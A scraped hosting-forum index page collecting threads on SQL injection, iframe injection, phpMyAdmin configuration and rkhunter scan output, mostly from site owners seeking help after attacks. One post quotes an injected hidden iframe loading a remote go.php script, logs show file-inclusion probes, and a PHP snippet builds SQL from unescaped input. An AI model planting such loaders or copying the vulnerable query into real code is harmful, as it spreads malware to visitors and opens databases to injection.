PhpMyAdmin SQL Injection

Dec 13, 2008

Anyone using phpMyAdmin for MySQL admin, you need to know about a newly discovered attack vector.

Here's the official announcement: [url]

The key to this is in their description, "A logged-in user can be subject of SQL injection through cross site request forgery. Several scripts in phpMyAdmin are vulnerable and the attack can be made through table parameter."

A logged in user... This attack is a combination of SQL injection through CSRF. In other words, you'd have to be logged into your phpMyAdmin program, hit a website setup for CSRF, and then the attacker could have access to your phpMyAdmin as you.

If there's interest here, I could write up a detailed description of CSRF and how to prevent this type of attack.

Just let me know...

You should upgrade immediately to either phpMyAdmin 2.9.11.4 or 3.1.1.0 or apply patch 12100.

View 9 Replies


ADVERTISEMENT

Sql Injection

Jul 8, 2009

I had a non client send me an email about being hacked. apparently the hacker is using a program/command line and is entering this into the db:

user=' &pass1=111-222-1933email@adress.tst&pass2=test&submit=
create%20Account

any way he can patch up his navicat database to stop this?

View 9 Replies View Related

URL Injection

Aug 17, 2007

I've experienced so much hacker attack lately. Hosted wiht hostforweb.com if that makes any difference.

Last issue I have is:
Type of attack: URL Injection -- attempt to inject / load files onto the
server via PHP/CGI vulnerabilities

How I can secure my server against such attacks?

Also I need to resolve this issue ASAP but can not find the file and I don't know what to do.

Report:

Sample log report including date and time stamp:

Request: rosemarythecelticlady.com 64.202.102.218 - - [13/Aug/2007:11:50:03
-0500] GET
/awstats/data/awstats1...marythecelticlady.com.txt/admin/index.php?o=[url]HTTP/1.1 302 228 - libwww-perl/5.808 - -

Request: rosemarythecelticlady.com 64.202.102.218 - - [13/Aug/2007:11:50:04
-0500] GET /admin/index.php?o=[url]HTTP/1.1
302 228 - libwww-perl/5.808 - -

Request: rosemarythecelticlady.com 64.202.102.218 - - [13/Aug/2007:11:50:04
-0500] GET
/awstats/data/admin/index.php?o=[url]
HTTP/1.1 302 228 - libwww-perl/5.808 - -

WHAT NEEDS TO BE DONE HERE and where to located it? Your help is greatly appreciated.

View 0 Replies View Related

Iframe Injection

Jul 22, 2009

Yesterday it was discovered that a website had most or all of the html pages compromised with some sort of iframe injection. Every page had an iframe line added to the bottom that attempted to load something from another website. It was coming from a domain called reycross.net and was attempting to load the html/framer virus into the visitor's computer.

The problem is that I cannot identify how the injection hit the system. Here are the facts I can provide...

1. The server does NOT have Joomla or Wordpress.

2. The injection seemed to hit every html page whether the page was active on the site or not.

3. The injection hit only one account.

I have checked /var/log/messages and /var/log/secure and find nothing.

What I don't have is proper ftp logging to determine whether the injection came from that method.

Additional notes: Shortly before the injection took place the box was updated to the latest version of cpanel. Also php was upgraded to 5.2.10. At the time suPHP was enabled but unfortunately had to be disabled because it created problems with another site. Prior to this suPHP was disabled as well.

I went through and removed all instances of this iframe injection and ran another update of cpanel. I also recompiled apache/php and went back to 5.2.8 in case the problem was php related.

View 13 Replies View Related

Iframe Injection

Jun 9, 2007

One of my site index page is having iframe injections. I am not sure about the reason. page is chmod to 644 under php.ini dl() is even disabled.

But still person is some how able to inject iframe that redirects the page to some other url.

Any suggestions how to fix that ? any mod_rewrite rule or anything for this?

View 9 Replies View Related

Reverse Proxy And SQL Injection

Jun 30, 2009

Does deploying a reverse proxy in front of the web/db server reduce the threat of SQL injection?

Emphasis on 'reduce' the threat - or does it provide no help at all?

View 3 Replies View Related

Php Injection & Session Hacking

May 28, 2008

I had done a program in early 2006 for a site in php-mysql. At the time of doing the code, The code written was not so standard and it contained uninitialized variables used for include file paths (eventhough values are assigned to it before using) and the "sess" folder was created within the website folder. Also the parameters for the SQL query were not escaped, but everything was working fine.

And now i was informed that the insecure code in my program caused the server crash and i have to pay the penalty for the same. Can anyone let me know whether the below code / keeping the session variables within a folder inside the /www/ will make the sites hosted on the server where this program runs to stop/crash for ever ?

------------------------------------------------------------------
function update_region($id,$regname,$regcom)
{
$query = "UPDATE taxregion_mast SET taxregion_name = '". $regname."',
region_comments = '". $regcom."' WHERE region_id =" .$id;
mysql_query($query);

......
-------------------------------------------------------------------

View 3 Replies View Related

Prevention LFI And SQL Injection Attacks

May 12, 2008

i am seeing a lot of Local file inclusion (LFI) and mysql injection attacks quite often directed to php scripts.

what is the way to prevent them? would installing mod_security to apache work?

View 6 Replies View Related

Does CISCO ASA Firewall Block SQL And XSS Injection?

Dec 25, 2008

Does CISCO ASA Firewall block SQL and XSS Injection? If not, then which are the firewalls available which do this job. I have checked web application firewalls and found them to be too costly for my budget. What are the other cheap options available?

View 3 Replies View Related

Win 2003 + Mssql Attacks Injection

Jun 2, 2008

I see on one server with windows 2k3 and sql 2000 alot of Injection attemts(lucky so far) and 90% come from china.

Is there any way on iis6 to put range ban like 123.52.0.0 - 123.55.255.255 so to ban all that network?

View 1 Replies View Related

Iframe Injection And Rkhunter Warnings

Aug 25, 2007

I have a major problem with injecting iframes into every files (header.php footer.php index.php login.php and vars.php ) on all server account.

Code:
<iframe src='h t t p : / / 8 1 . 9 5 . 1 4 5 . 2 4 0 / g o . p h p ? s i d = 1' style='border:0px solid gray;' WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe>
what is the reason and how to fix that ?


and I have the second problem is the rkhunter warnings I am not sure if that have relations with the first problem :
rkhunter results:

Code:
Checking system commands...

Performing 'strings' command checks
Checking 'strings' command [ OK ]

Performing 'shared libraries' checks
Checking for preloading variables [ None found ]
Checking for preload file [ Not found ]
Checking LD_LIBRARY_PATH variable [ Not found ]

Performing file properties checks
Checking for prerequisites [ Warning ]
/bin/awk [ OK ]
/bin/basename [ OK ]
/bin/bash [ OK ]
/bin/cat [ OK ]
/bin/chmod [ OK ]
/bin/chown [ OK ]
/bin/cp [ OK ]
/bin/csh [ OK ]
/bin/cut [ OK ]
/bin/date [ OK ]
/bin/df [ OK ]
/bin/dmesg [ OK ]
/bin/echo [ OK ]
/bin/ed [ OK ]
/bin/egrep [ OK ]
/bin/env [ OK ]
/bin/fgrep [ OK ]
/bin/grep [ OK ]
/bin/kill [ OK ]
/bin/login [ OK ]
/bin/ls [ OK ]
/bin/mail [ OK ]
/bin/mktemp [ OK ]
/bin/more [ OK ]
/bin/mount [ OK ]
/bin/mv [ OK ]
/bin/netstat [ OK ]
/bin/passwd [ OK ]
/bin/ps [ OK ]
/bin/pwd [ OK ]
/bin/rpm [ OK ]
/bin/sed [ OK ]
/bin/sh [ OK ]
/bin/sort [ OK ]
/bin/su [ OK ]
/bin/touch [ OK ]
/bin/uname [ OK ]
/bin/gawk [ OK ]
/bin/tcsh [ OK ]
/usr/bin/awk [ OK ]
/usr/bin/chattr [ OK ]
/usr/bin/curl [ OK ]
/usr/bin/cut [ OK ]
/usr/bin/diff [ OK ]
/usr/bin/dirname [ OK ]
/usr/bin/du [ OK ]
/usr/bin/env [ OK ]
/usr/bin/file [ OK ]
/usr/bin/find [ OK ]
/usr/bin/GET [ Warning ]
/usr/bin/groups [ Warning ]
/usr/bin/head [ OK ]
/usr/bin/id [ OK ]
/usr/bin/kill [ OK ]
/usr/bin/killall [ OK ]
/usr/bin/last [ OK ]
/usr/bin/lastlog [ OK ]
/usr/bin/ldd [ Warning ]
/usr/bin/less [ OK ]
/usr/bin/locate [ OK ]
/usr/bin/logger [ OK ]
/usr/bin/lsattr [ OK ]
/usr/bin/lynx [ OK ]
/usr/bin/md5sum [ OK ]
/usr/bin/newgrp [ OK ]
/usr/bin/passwd [ OK ]
/usr/bin/perl [ OK ]
/usr/bin/pstree [ OK ]
/usr/bin/readlink [ OK ]
/usr/bin/runcon [ OK ]
/usr/bin/sha1sum [ OK ]
/usr/bin/size [ OK ]
/usr/bin/slocate [ OK ]
/usr/bin/stat [ OK ]
/usr/bin/strace [ OK ]
/usr/bin/strings [ OK ]
/usr/bin/sudo [ OK ]
/usr/bin/tail [ OK ]
/usr/bin/test [ OK ]
/usr/bin/top [ OK ]
/usr/bin/tr [ OK ]
/usr/bin/uniq [ OK ]
/usr/bin/users [ OK ]
/usr/bin/vmstat [ OK ]
/usr/bin/w [ OK ]
/usr/bin/watch [ OK ]
/usr/bin/wc [ OK ]
/usr/bin/wget [ OK ]
/usr/bin/whatis [ Warning ]
/usr/bin/whereis [ OK ]
/usr/bin/which [ OK ]
/usr/bin/who [ OK ]
/usr/bin/whoami [ OK ]
/usr/bin/gawk [ OK ]
/sbin/chkconfig [ OK ]
/sbin/depmod [ OK ]
/sbin/ifconfig [ OK ]
/sbin/ifdown [ Warning ]
/sbin/ifup [ Warning ]
/sbin/init [ OK ]
/sbin/insmod [ OK ]
/sbin/ip [ OK ]
/sbin/lsmod [ OK ]
/sbin/modinfo [ OK ]
/sbin/modprobe [ OK ]
/sbin/nologin [ OK ]
/sbin/rmmod [ OK ]
/sbin/runlevel [ OK ]
/sbin/sulogin [ OK ]
/sbin/sysctl [ OK ]
/sbin/syslogd [ OK ]
/usr/sbin/adduser [ OK ]
/usr/sbin/chroot [ OK ]
/usr/sbin/groupadd [ OK ]
/usr/sbin/groupdel [ OK ]
/usr/sbin/groupmod [ OK ]
/usr/sbin/grpck [ OK ]
/usr/sbin/kudzu [ OK ]
/usr/sbin/lsof [ OK ]
/usr/sbin/prelink [ OK ]
/usr/sbin/pwck [ OK ]
/usr/sbin/tcpd [ OK ]
/usr/sbin/useradd [ OK ]
/usr/sbin/userdel [ OK ]
/usr/sbin/usermod [ OK ]
/usr/sbin/vipw [ OK ]
/usr/sbin/xinetd [ OK ]
/usr/local/bin/perl [ OK ]
/usr/local/bin/rkhunter [ OK ]

Checking for rootkits...

Performing check of known rootkit files and directories
55808 Trojan - Variant A [ Not found ]
ADM Worm [ Not found ]
AjaKit Rootkit [ Not found ]
aPa Kit [ Not found ]
Apache Worm [ Not found ]
Ambient (ark) Rootkit [ Not found ]
Balaur Rootkit [ Not found ]
BeastKit Rootkit [ Not found ]
beX2 Rootkit [ Not found ]
BOBKit Rootkit [ Not found ]
CiNIK Worm (Slapper.B variant) [ Not found ]
Danny-Boy's Abuse Kit [ Not found ]
Devil RootKit [ Not found ]
Dica-Kit Rootkit [ Not found ]
Dreams Rootkit [ Not found ]
Duarawkz Rootkit [ Not found ]
Enye LKM [ Not found ]
Flea Linux Rootkit [ Not found ]
FreeBSD Rootkit [ Not found ]
****`it Rootkit [ Not found ]
GasKit Rootkit [ Not found ]
Heroin LKM [ Not found ]
HjC Kit [ Not found ]
ignoKit Rootkit [ Not found ]
ImperalsS-FBRK Rootkit [ Not found ]
Irix Rootkit [ Not found ]
Kitko Rootkit [ Not found ]
Knark Rootkit [ Not found ]
Li0n Worm [ Not found ]
Lockit / LJK2 Rootkit [ Not found ]
Mood-NT Rootkit [ Not found ]
MRK Rootkit [ Not found ]
Ni0 Rootkit [ Not found ]
Ohhara Rootkit [ Not found ]
Optic Kit (Tux) Worm [ Not found ]
Oz Rootkit [ Not found ]
Phalanx Rootkit [ Not found ]
Phalanx Rootkit (strings) [ Not found ]
Portacelo Rootkit [ Not found ]
R3dstorm Toolkit [ Not found ]
RH-Sharpe's Rootkit [ Not found ]
RSHA's Rootkit [ Not found ]
Scalper Worm [ Not found ]
Sebek LKM [ Not found ]
Shutdown Rootkit [ Not found ]
SHV4 Rootkit [ Not found ]
SHV5 Rootkit [ Not found ]
Sin Rootkit [ Not found ]
Slapper Worm [ Not found ]
Sneakin Rootkit [ Not found ]
Suckit Rootkit [ Not found ]
SunOS Rootkit [ Not found ]
SunOS / NSDAP Rootkit [ Not found ]
Superkit Rootkit [ Not found ]
TBD (Telnet BackDoor) [ Not found ]
TeLeKiT Rootkit [ Not found ]
T0rn Rootkit [ Not found ]
Trojanit Kit [ Not found ]
Tuxtendo Rootkit [ Not found ]
URK Rootkit [ Not found ]
VcKit Rootkit [ Not found ]
Volc Rootkit [ Not found ]
X-Org SunOS Rootkit [ Not found ]
zaRwT.KiT Rootkit [ Not found ]

Performing additional rootkit checks
Suckit Rookit additional checks [ OK ]
Checking for possible rootkit files and directories [ None found ]
Checking for possible rootkit strings [ None found ]

Performing malware checks
Checking running processes for suspicious files [ None found ]
Checking for login backdoors [ None found ]
Checking for suspicious directories [ None found ]
Checking for sniffer log files [ None found ]

Performing trojan specific checks
Checking for enabled xinetd services [ None found ]
Checking for Apache backdoor [ Not found ]

Performing Linux specific checks
Checking kernel module commands [ OK ]
Checking kernel module names [ OK ]
Checking the network...

Performing check for backdoor ports
Checking for UDP port 2001 [ Not found ]
Checking for TCP port 2006 [ Not found ]
Checking for TCP port 2128 [ Not found ]
Checking for TCP port 14856 [ Not found ]
Checking for TCP port 47107 [ Not found ]
Checking for TCP port 60922 [ Not found ]

Performing checks on the network interfaces
Checking for promiscuous interfaces [ None found ]

Checking the local host...

Performing system boot checks
Checking for local host name [ Found ]
Checking for local startup files [ Found ]
Checking local startup files for malware [ None found ]
Checking system startup files for malware [ None found ]

Performing group and account checks
Checking for passwd file [ Found ]
Checking for root equivalent (UID 0) accounts [ None found ]
Checking for passwordless accounts [ None found ]
Checking for passwd file changes [ None found ]
Checking for group file changes [ None found ]
Checking root account shell history files [ OK ]

Performing system configuration file checks
Checking for SSH configuration file [ Found ]
Checking if SSH root access is allowed [ Warning ]
Checking if SSH protocol v1 is allowed [ Warning ]
Checking for running syslog daemon [ Found ]
Checking for syslog configuration file [ Found ]
Checking if syslog remote logging is allowed [ Not allowed ]

Performing filesystem checks
Checking /dev for suspicious file types [ None found ]
Checking for hidden files and directories [ Warning ]
Checking application versions...

Checking version of Exim MTA [ OK ]
Checking version of GnuPG [ Warning ]
Checking version of Apache [ Skipped ]
Checking version of Bind DNS [ OK ]
Checking version of OpenSSL [ Warning ]
Checking version of PHP [ OK ]
Checking version of Procmail MTA [ OK ]
Checking version of OpenSSH [ OK ]

System checks summary
=====================

File properties checks...
Required commands check failed
Files checked: 129
Suspect files: 6

Rootkit checks...
Rootkits checked : 114
Possible rootkits: 0

Applications checks...
Applications checked: 8
Suspect applications: 2

The system checks took: 3 minutes and 12 seconds

All results have been written to the logfile (/var/log/rkhunter.log)

One or more warnings have been found while checking the system.

Please check the log file (/var/log/rkhunter.log)

View 5 Replies View Related

How To Protect MySQL Database From My SQL Injection Attacks

Apr 11, 2009

some body attacking on my server and changing my users profile name /password or any other information so How To Protect MySQL Database From My SQL Injection Attacks? i have dedicate server i provide free wap sites to people with wildcard dns system and i have ConfigServer Security & Firewall installed.

View 3 Replies View Related

Java Script Injection On Html Pages

Jan 11, 2008

We are facing this strange Problem from yesterday that

<script language=javascript src= [url]
is added on end of every html Pages.

I don,t know that how this Injection on every Html Pages.

View 1 Replies View Related

Cacti Command Execution And SQL Injection Vulnerabilities

Jan 14, 2007

Cacti version 0.8.6i has vulnerability: [url]

Solution: [url]

View 2 Replies View Related

BEWARE -Sudden Iframe Injection Attacks, Catastrophic Results

Sep 4, 2007

All my sites on both my hosting accounts are infected with an iframe.

At the end of the index.html files the malicious code just appeared...suddenly 3 weeks ago.

The host blamed Joomla so I took the appropriate steps:

Upgraded my Joomla to the latest version, changed the whole account username and password, changed the configuration and template to unwriteable.

It stopped the injection for a few days but then it came back.
I would also like to add that 2 other sites on my account, one simple index.html file and an old website I have that is totally HTML with nothing to do with Joomla also got infected.

The iframe also infected a Drupal install I did as a test.

So according to these fact is this a Hosting Company not taking responsibility or can a Joomla site infected spread to other normal HTML sites and different CMS's on the server?

This situation is ruinning me and I strongly suspect it's a Hosting problem and not Joomla.

Any expert opinions from true professionals would be appreciated because if I can prove that it's not a Joomla issue I might take legal action against the hosting company since this has cost me dozens of hours of work and several hundred dollars of lost revenue.

I am attaching the iframe exploit. It installs itself on every index file...in every folder - components, mambots, ect..additionally it attaches itself on any and every kind of addon that has an index.html file.

View 2 Replies View Related

Knowledge Of Mysql Exploit Or Mysql Injection?

Jan 17, 2008

Can someone recommended me some one with knowledge of mysql exploit or mysql injection, it seem to our VB forum have issue with database load..

View 5 Replies View Related

Phpmyadmin

Dec 3, 2008

i downloaded a copy of phpmyadmin and uploaded it to my hosting.. then i run mydomain.com/phpmyadmin/setup configured the server to my hosting IP address but it says i can't login using myusername@localhost do i need to do something on a cpanel mysql server to listen to the external phpmyadmin?

View 1 Replies View Related

PhpMyAdmin

Jan 15, 2007

I've only messed around in php/mysql stuff on occasion, so I'm still new to it.

When I access domain.com/phpmyadmin and log in, I see two things that I believe are preventing my stuff from connecting and working properly.

**Your configuration file contains settings (root with no password) that correspond to the default MySQL privileged account. Your MySQL server is running with this default, is open to intrusion, and you really should fix this security hole.

**The mbstring PHP extension was not found and you seem to be using a multibyte charset.

Without the mbstring extension phpMyAdmin is unable to split strings correctly and it may result in unexpected results.

View 4 Replies View Related

PhpMyAdmin Not Showing Up

Jul 18, 2009

I've just did the following on Ubuntu Server 9.03:

Code:

sudo apt-get install mysql-server
sudo apt-get install apache2
sudo apt-get install php5
sudo apt-get install php5-mysql
sudo apt-get install phpmyadmin

But when I say [url]-- it cannot be found..

I tried [url]as well, It cannot be found either.

View 2 Replies View Related

Accessing PHPMyadmin

Aug 12, 2009

I am using plesk and created one database from my control panel and also created a user to

access the database. Now my concern is how can I access phymyadmin. Is it possible to access

PHPMyadmin from Plesk? Or is there any other way to manage my database?

View 3 Replies View Related

PHPMyAdmin - 404 Error

Sep 16, 2008

I've got phpMyAdmin setup, but when I logout or try to browse a table I get 404 error. Everything is CHMOD as 755. Ideas? I'm also running off of LiteSpeed

View 3 Replies View Related

PhpMyAdmin - Error

Jun 10, 2008

i have a problme in the server .. that when any site try to login the phpmyadmin this message appears " #2002 - The server is not responding (or the local MySQL server's socket is not correctly configured)

View 2 Replies View Related

How To Uprgade Phpmyadmin

Jan 20, 2008

i m using DA server. i want to upgrade to latest version.

View 7 Replies View Related

PhpMyAdmin Not Working

Dec 28, 2007

My PhpMyAdmin is not working properly.

Everytime I try to use it, it tells me:

"Cannot start session without errors, please check errors given in your PHP and/or webserver log file and configure your PHP installation properly."

My PHP install is perfectly fine, and session support is enabled.

View 2 Replies View Related

How To Config PhpMyAdmin

Aug 23, 2007

I am a newbie and now i am running a VPS account. I have some questions want to ask you
Where is the locate of phpMyAdmin?

I am running VPS server but get error when access to phpmyadmin.

Quote:

Wrong username/password. Access denied.

I created a user=root and passworld=xxx in my WHM.

How to find config.inc.php ?
- locate but error

Quote:

warning: locate: could not open database: /var/lib/slocate/slocate.db: No such file or directory

warning: You need to run the 'updatedb' command (as root) to create the database.

Please have a look at /etc/updatedb.conf to enable the daily cron job.

View 4 Replies View Related

PhpMyAdmin On IIS7

Feb 22, 2007

I've been struggling with getting phpMyAdmin to work on IIS7 for a long time. I've tried just about everything I can possibly think of, in the process, breaking both PHP and MySQL several times.

Ok...so my PHP and MySQL is working great now...but I still can't get phpMyAdmin to work. I get the following message :

Quote:

Cannot load mysql extension. Please check your PHP configuration. - Documentation

If you anyone has some advice, I will appreciate it.

I'm running :
PHP 5.1.2
MySQL 5
IIS7
Vista

View 0 Replies View Related

Upgrading PhpMyAdmin

May 27, 2007

Has anyone seen any docs on upgrading phpMyAdmin? And does it need to be done via SSH?

I'm on a MediaTemple (gs)...

View 1 Replies View Related

Config PhpMyAdmin

Aug 23, 2007

I have a problem when i config config.inc.php file in my WHM . I don't know why share accounts can access to phpMyAdmin or create your database from cpanel .

This is a part of config.inc.php file

Quote:

/**
* Disable the default warning that is displayed on the DB Details Structure page if
* any of the required Tables for the relationfeatures could not be found
*/
$cfg['PmaNoRelation_DisableWarning'] = FALSE;

/**
* The 'cookie' auth_type uses blowfish algorithm to encrypt the password. If
* at least one server configuration uses 'cookie' auth_type, enter here a
* passphrase that will be used by blowfish. The maximum length seems to be 46
* characters.
*/
$cfg['blowfish_secret'] = '';

/**
* Server(s) configuration
*/
$i = 0;
// The $cfg['Servers'] array starts with $cfg['Servers'][1]. Do not use
// $cfg['Servers'][0]. You can disable a server config entry by setting host
// to ''. If you want more than one server, just copy following section
// (including $i incrementation) serveral times. There is no need to define
// full server array, just define values you need to change.
$i++;
$cfg['Servers'][$i]['host'] = 'localhost'; // MySQL hostname or IP address
$cfg['Servers'][$i]['port'] = ''; // MySQL port - leave blank for default port
$cfg['Servers'][$i]['socket'] = ''; // Path to the socket - leave blank for default socket
$cfg['Servers'][$i]['ssl'] = false; // Use SSL for connecting to MySQL server?
$cfg['Servers'][$i]['connect_type'] = 'tcp'; // How to connect to MySQL server ('tcp' or 'socket')
$cfg['Servers'][$i]['extension'] = 'mysql'; // The php MySQL extension to use ('mysql' or 'mysqli')
$cfg['Servers'][$i]['compress'] = FALSE; // Use compressed protocol for the MySQL connection
// (requires PHP >= 4.3.0)
$cfg['Servers'][$i]['controluser'] = ''; // MySQL control user settings
// (this user must have read-only
$cfg['Servers'][$i]['controlpass'] = ''; // access to the "mysql/user"
// and "mysql/db" tables).
// The controluser is also
// used for all relational
// features (pmadb)
$cfg['Servers'][$i]['auth_type'] = 'config'; // Authentication method (valid choices: config, http, HTTP, signon or cookie)
$cfg['Servers'][$i]['user'] = ''; // MySQL user
$cfg['Servers'][$i]['password'] = ''; // MySQL password (only needed
// with 'config' auth_type)
$cfg['Servers'][$i]['SignonSession'] = ''; // Session to use for 'signon' auth method
$cfg['Servers'][$i]['SignonURL'] = ''; // URL where to redirect user to login for 'signon' auth method
$cfg['Servers'][$i]['LogoutURL'] = ''; // URL where to redirect user after logout
$cfg['Servers'][$i]['nopassword'] = FALSE; // Whether to try to connect without password
$cfg['Servers'][$i]['only_db'] = ''; // If set to a db-name, only
// this db is displayed in left frame
// It may also be an array of db-names, where sorting order is relevant.
$cfg['Servers'][$i]['hide_db'] = ''; // Database name to be hidden from listings
$cfg['Servers'][$i]['verbose'] = ''; // Verbose name for this host - leave blank to show the hostname

$cfg['Servers'][$i]['pmadb'] = ''; // Database used for Relation, Bookmark and PDF Features
// (see scripts/create_tables.sql)
// - leave blank for no support
// DEFAULT: 'phpmyadmin'
$cfg['Servers'][$i]['bookmarktable'] = ''; // Bookmark table
// - leave blank for no bookmark support
// DEFAULT: 'pma_bookmark'
$cfg['Servers'][$i]['relation'] = ''; // table to describe the relation between links (see doc)
// - leave blank for no relation-links support
// DEFAULT: 'pma_relation'
$cfg['Servers'][$i]['table_info'] = ''; // table to describe the display fields
// - leave blank for no display fields support
// DEFAULT: 'pma_table_info'
$cfg['Servers'][$i]['table_coords'] = ''; // table to describe the tables position for the PDF schema
// - leave blank for no PDF schema support
// DEFAULT: 'pma_table_coords'
$cfg['Servers'][$i]['pdf_pages'] = ''; // table to describe pages of relationpdf
// - leave blank if you don't want to use this
// DEFAULT: 'pma_pdf_pages'
$cfg['Servers'][$i]['column_info'] = ''; // table to store column information
// - leave blank for no column comments/mime types
// DEFAULT: 'pma_column_info'
$cfg['Servers'][$i]['history'] = ''; // table to store SQL history
// - leave blank for no SQL query history
// DEFAULT: 'pma_history'
$cfg['Servers'][$i]['designer_coords'] = ''; // table to store the coordinates for Designer
// - leave blank for no Designer feature
// DEFAULT: 'pma_designer_coords'
$cfg['Servers'][$i]['verbose_check'] = TRUE; // set to FALSE if you know that your pma_* tables
// are up to date. This prevents compatibility
// checks and thereby increases performance.
$cfg['Servers'][$i]['AllowRoot'] = TRUE; // whether to allow root login
$cfg['Servers'][$i]['AllowDeny']['order'] // Host authentication order, leave blank to not use
= '';
$cfg['Servers'][$i]['AllowDeny']['rules'] // Host authentication rules, leave blank for defaults
= array();

// If you have more than one server configured, you can set $cfg['ServerDefault']
// to any one of them to autoconnect to that server when phpMyAdmin is started,
// or set it to 0 to be given a list of servers without logging in
// If you have only one server configured, $cfg['ServerDefault'] *MUST* be
// set to that server.
$cfg['ServerDefault'] = 1; // Default server (0 = no default server)

/**
* Other core phpMyAdmin settings
*/
$cfg['MaxDbList'] = 100; // maximum number of db's displayed in left frame and databaes list
$cfg['OBGzip'] = 'auto'; // use GZIP output buffering if possible (TRUE|FALSE|'auto')
$cfg['PersistentConnections'] = FALSE; // use persistent connections to MySQL database
$cfg['ForceSSL'] = FALSE; // whether to force using https
$cfg['ExecTimeLimit'] = 300; // maximum execution time in seconds (0 for no limit)
$cfg['MemoryLimit'] = 0; // maximum allocated bytes (0 for no limit)
$cfg['SkipLockedTables'] = FALSE; // mark used tables, make possible to show
// locked tables (since MySQL 3.23.30)
$cfg['ShowSQL'] = TRUE; // show SQL queries as run
$cfg['AllowUserDropDatabase'] = FALSE; // show a 'Drop database' link to normal users
$cfg['Confirm'] = TRUE; // confirm 'DROP TABLE' & 'DROP DATABASE'
$cfg['LoginCookieRecall'] = TRUE; // recall previous login in cookie auth. mode or not
$cfg['LoginCookieValidity'] = 1800; // validity of cookie login (in seconds)
$cfg['LoginCookieStore'] = 0; // how long login cookie should be stored (in seconds)
$cfg['LoginCookieDeleteAll'] = TRUE; // whether to delete all login cookies on logout
$cfg['UseDbSearch'] = TRUE; // whether to enable the "database search" feature
// or not
$cfg['IgnoreMultiSubmitErrors'] = FALSE; // if set to true, PMA continues computing multiple-statement queries
// even if one of the queries failed
$cfg['VerboseMultiSubmit'] = TRUE; // if set to true, PMA will show the affected rows of EACH statement on
// multiple-statement queries. See the libraries/import.php file for
// hardcoded defaults on how many queries a statement may contain!
$cfg['AllowArbitraryServer'] = FALSE; // allow login to any user entered server in cookie based auth

// Left frame setup
$cfg['LeftFrameLight'] = TRUE; // use a select-based menu and display only the
// current tables in the left frame.
$cfg['LeftFrameDBTree'] = TRUE; // turn the select-based light menu into a tree
$cfg['LeftFrameDBSeparator'] = '_'; // the separator to sub-tree the select-based light menu tree
$cfg['LeftFrameTableSeparator']= '__'; // Which string will be used to generate table prefixes
// to split/nest tables into multiple categories
$cfg['LeftFrameTableLevel'] = '1'; // How many sublevels should be displayed when splitting
// up tables by the above Separator
$cfg['ShowTooltip'] = TRUE; // display table comment as tooltip in left frame
$cfg['ShowTooltipAliasDB'] = FALSE; // if ShowToolTip is enabled, this defines that table/db comments
$cfg['ShowTooltipAliasTB'] = FALSE; // are shown (in the left menu and db_structure) instead of
// table/db names. Setting ShowTooltipAliasTB to 'nested' will only
// use the Aliases for nested descriptors, not the table itself.

$cfg['LeftDisplayLogo'] = TRUE; // display logo at top of left frame
$cfg['LeftLogoLink'] = 'main.php'; // where should logo link point to
// (can also contain an external URL)
$cfg['LeftLogoLinkWindow'] = 'main'; // whether to open the linked page
// in the main window ('main')
// or in a new window ('new')
$cfg['LeftDisplayServers'] = FALSE; // display server choice at top of left frame
$cfg['DisplayServersList'] = FALSE; // server choice as links
$cfg['DisplayDatabasesList'] = FALSE; // database choice in light as links

// In the main frame, at startup...
$cfg['ShowStats'] = TRUE; // allow to display statistics and space usage in
// the pages about database details and table
// properties
$cfg['ShowPhpInfo'] = FALSE; // show php info link
$cfg['ShowServerInfo'] = TRUE; // show MySQL server information
$cfg['ShowChgPassword'] = FALSE; // show change password link
$cfg['ShowCreateDb'] = TRUE; // show create database form
$cfg['SuggestDBName'] = TRUE; // suggest a new DB name if possible (false = keep empty)

Some questions
--------------------------------------------------
$cfg['Servers'][$i]['controluser'] =?

$cfg['Servers'][$i]['controlpass'] =?

--------------------------------------------------

$cfg['Servers'][$i]['user'] =?
$cfg['Servers'][$i]['password'] =?

View 2 Replies View Related

Charset In PhpMyAdmin

May 20, 2007

I have a auction website using php and mySQL and categories are saved in database. When i tried to add new categories in Admin area such as: &#272;à N&#7861;ng(Vietnamese) and when i saved, it displayed something funny like this:"&#271;à N&#ng". I have modified charset in myPhPadmin for the database and for categories table to uft-8, but it won't help.

View 4 Replies View Related

How Can I Install Phpmyadmin

Sep 4, 2007

Because phpmyadmin on powervps'directadmin doesnt support phpMyAdmin - 2.10.3 version, so I have to install it by my self. I read the instruction in here

[url]

But I dont understand.

First of all: How can I upload the file to directory /var/tmp?

2, when I type the command below, it did not work:

# cd /home/httpd/SSLSERVER-443/html
# tar zxvf /var/tmp/phpMyAdmin-2.7.0-pl1.tar.gz
# mv phpMyAdmin-2.7.0-pl1 phpMyAdmin

And the following commands did not work too.

I really need the version above to run my database. The current phpmyadmin does not support it and that why my database got error when I was trying to restore.

View 2 Replies View Related

Somebody Is Scanning My Site For PhpMyAdmin

Jul 9, 2009

I found several requests in my error log which looks like someone was scanning my site for phpMyAdmin. This was a newly created subdomain. So I checked my main site and another subdomain and they also contained similar entries. Should I do something?

[Fri Jul 03 03:23:16 2009] [error] [client 65.23.157.214] File does not exist: /var/www/vhosts/mydomain.com/subdomains/mysubdomain/httpdocs/phpMyAdmin
[Fri Jul 03 03:23:16 2009] [error] [client 65.23.157.214] File does not exist: /var/www/vhosts/mydomain.com/subdomains/mysubdomain/httpdocs/phpmyadmin
[Fri Jul 03 03:23:16 2009] [error] [client 65.23.157.214] File does not exist: /var/www/vhosts/mydomain.com/subdomains/mysubdomain/httpdocs/pma ...

View 14 Replies View Related







Copyrights 2005-15 www.BigResource.com, All rights reserved